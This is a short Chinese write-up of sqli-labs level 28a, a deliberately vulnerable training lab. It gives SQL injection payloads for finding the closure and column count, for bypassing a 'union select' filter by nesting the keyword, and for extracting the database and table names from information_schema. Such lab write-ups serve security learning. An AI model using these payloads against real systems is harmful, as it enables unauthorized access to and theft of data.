0X01构造闭合 爆字段数

/?id=1') order by 1%23

sqli-labs(28a)

?id=1') order by 5%23

sqli-labs(28a)

 

偷看一下源码

sqli-labs(28a)

就只过滤了union select

闭合')

那我们来尝试一下

0X02爆库名

用我们28关的语句继续构造

-1') uniounion selectn select 1,database(),3%23

sqli-labs(28a)

0X02爆表名

/?id=-1') uniounion selectn select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23

sqli-labs(28a)

 

 

学习之路 少就是多 慢就是快

相关文章:

  • 2021-09-27
  • 2022-01-20
  • 2021-05-07
  • 2021-08-23
  • 2022-01-02
  • 2021-09-30
  • 2021-10-22
  • 2021-08-22
猜你喜欢
  • 2021-10-31
  • 2021-06-11
  • 2022-12-23
  • 2021-12-19
  • 2021-06-02
  • 2021-09-07
  • 2021-10-15
相关资源
相似解决方案